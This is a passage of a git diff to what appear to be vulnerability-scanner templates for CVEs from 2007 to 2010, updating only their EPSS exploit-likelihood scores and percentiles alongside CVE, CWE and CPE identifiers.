cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - epss-score: 0.00827 - epss-percentile: 0.79978 + epss-score: 0.0093 + epss-percentile: 0.81235 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 0b75097769..d2592e484e 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - epss-percentile: 0.86278 + epss-percentile: 0.86314 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 04f66dce08..85be107393 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.19583 - epss-percentile: 0.95804 + epss-percentile: 0.9585 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index aa28240ef1..96e94ca71e 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - epss-percentile: 0.88642 + epss-percentile: 0.88705 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 86cffe969a..b3176eb785 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - epss-percentile: 0.85386 + epss-percentile: 0.85461 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 0b16c19cce..7badc347fa 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - epss-score: 0.00938 - epss-percentile: 0.81246 + epss-score: 0.00663 + epss-percentile: 0.77452 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 182e4ff960..582192e6e5 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 - epss-score: 0.03025 - epss-percentile: 0.89874 + epss-score: 0.03875 + epss-percentile: 0.91049 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index eb2dd50f03..8ca162d26f 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - epss-percentile: 0.67745 + epss-percentile: 0.67909 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 3dacac2ead..4e54d8f514 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - epss-percentile: 0.92894 + epss-percentile: 0.92938 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 60ae910df7..abe1048991 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - epss-percentile: 0.82017 + epss-percentile: 0.82089 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index bd1125ede7..ed55011b20 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-4764 cwe-id: CWE-22 epss-score: 0.02365 - epss-percentile: 0.88649 + epss-percentile: 0.88711 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 2d59d570f4..3f196ce65a 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88562 + epss-percentile: 0.88625 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 2a1765763f..cd6c61fb3f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - epss-score: 0.00824 - epss-percentile: 0.79943 + epss-score: 0.03314 + epss-percentile: 0.9036 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index bbac849887..b24878a1c6 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.73871 + epss-percentile: 0.74001 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 529ec4dfe5..09f37598b3 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.01029 - epss-percentile: 0.821 + epss-percentile: 0.82175 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 3b7a0f0c62..9a5a30e923 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - epss-percentile: 0.71368 + epss-percentile: 0.71537 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 51f1f21cbc..3bc414bfff 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.69058 + epss-percentile: 0.69214 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 3fd4331563..3853c80ac2 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6982 cwe-id: CWE-79 epss-score: 0.0038 - epss-percentile: 0.69925 + epss-percentile: 0.70097 cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index c8fe03d801..5cd6bca79d 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01358 - epss-percentile: 0.8467 + epss-score: 0.01193 + epss-percentile: 0.83604 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 159656a9ff..08dac193d9 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 - epss-score: 0.10982 - epss-percentile: 0.94564 + epss-score: 0.10607 + epss-percentile: 0.94496 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 007940e9e3..593684a0dd 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 - epss-percentile: 0.99714 + epss-percentile: 0.99724 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 3da2192a79..5fd0a54698 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.91144 + epss-percentile: 0.91213 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 646906dc75..c72d74b9a3 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-1151 cwe-id: CWE-94 epss-score: 0.79256 - epss-percentile: 0.97972 + epss-percentile: 0.97998 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 6f335992fb..adbb7963bc 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-1496 cwe-id: CWE-22 epss-score: 0.00802 - epss-percentile: 0.79674 + epss-percentile: 0.79755 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 66e6bfa43e..bba9dd1f0b 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.8 cve-id: CVE-2009-1558 cwe-id: CWE-22 - epss-score: 0.00891 - epss-percentile: 0.80739 + epss-score: 0.01101 + epss-percentile: 0.82846 cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index ce82b92d4a..b3908a0866 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-1872 cwe-id: CWE-79 epss-score: 0.37553 - epss-percentile: 0.96824 + epss-percentile: 0.96847 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 4ca2de61da..c94b362c39 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-2015 cwe-id: CWE-22 epss-score: 0.00968 - epss-percentile: 0.81554 + epss-percentile: 0.81633 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 57cfc09f72..2f667d64d8 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - epss-score: 0.00517 - epss-percentile: 0.74079 + epss-score: 0.00629 + epss-percentile: 0.7675 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index af5743455d..f01c55af83 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-3053 cwe-id: CWE-22 epss-score: 0.00367 - epss-percentile: 0.69448 + epss-percentile: 0.69602 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 0500d83687..b5d93ef051 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2009-3318 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78131 + epss-percentile: 0.78254 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a3da99748f..722b3626b4 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-4202 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87395 + epss-percentile: 0.87449 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 4cab0df46c..d5db39f4af 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00611 - epss-percentile: 0.76237 + epss-percentile: 0.76341 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index be572176b2..3c329e28ed 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2009-4679 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 08a8e291fd..d65c697fb6 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2009-5020 cwe-id: CWE-20 epss-score: 0.00215 - epss-percentile: 0.59311 + epss-percentile: 0.59474 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 4fcbcb99ec..cfb97c72cf 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 - epss-score: 0.02357 - epss-percentile: 0.88627 + epss-score: 0.01329 + epss-percentile: 0.84559 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 47a5d2a53f..fb3cb586ca 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0157 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.79974 + epss-percentile: 0.80059 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 3aa975a83c..236e15ec54 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2010-0219 cwe-id: CWE-255 - epss-score: 0.97494 - epss-percentile: 0.99974 + epss-score: 0.97509 + epss-percentile: 0.99982 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 3c83303be4..df5e8bf434 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2010-0467 cwe-id: CWE-22 - epss-score: 0.0586 - epss-percentile: 0.92619 + epss-score: 0.06955 + epss-percentile: 0.93273 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 2102ec0059..cd1862114e 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2010-0696 cwe-id: CWE-22 - epss-score: 0.62698 - epss-percentile: 0.97523 + epss-score: 0.57303 + epss-percentile: 0.97404 cpe: cpe:2.3:a:joomlaworks:jw_allvideos:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 3d6f5cab73..b508919698 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01326 - epss-percentile: 0.84465 + epss-percentile: 0.84547 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index d8d2e8e160..1ab406270e 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index e423797e96..202d6dff4c 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0943 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83193 + epss-percentile: 0.83281 cpe: cpe:2.3:a:joomlart:com_jashowcase:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index b9411f790a..5cbc97a2ad 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73018 + epss-percentile: 0.73149 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index af6e5f85dd..ad2f84ef14 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79798 + epss-percentile: 0.79885 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 16da120308..8436c55801 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80459 + epss-percentile: 0.80553 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index e19aab2f21..1ce35186bb 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.83729 + epss-percentile: 0.83839 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 2f02fa0e59..72018b2ebe 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - epss-percentile: 0.92974 + epss-percentile: 0.93019 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 811b4cafde..8fcc70d379 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1081 cwe-id: CWE-22 epss-score: 0.0168 - epss-percentile: 0.86282 + epss-percentile: 0.8632 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 5bbe680253..7e67ccd006 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83193 + epss-percentile: 0.83281 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index d744e23582..e84ede67dd 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79798 + epss-percentile: 0.79885 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 07a22db236..4e6aca9a3f 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83587 + epss-percentile: 0.83694 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 4b1079360d..f9d0e38eab 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72258 + epss-percentile: 0.72402 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 4b9c11b144..7c9a7eb7a6 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90143 + epss-percentile: 0.90203 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 6fb0d4e198..f7dd410913 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83897 + epss-percentile: 0.83996 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 360c5c2c26..3834db0a3d 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86557 + epss-percentile: 0.86604 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 7ab4dfd294..416ecbaa37 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.84506 + epss-percentile: 0.84589 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index fb3b2be6e3..acadc8b7c7 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83193 + epss-percentile: 0.83281 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index e298444bc2..be587a7a64 100644 --- 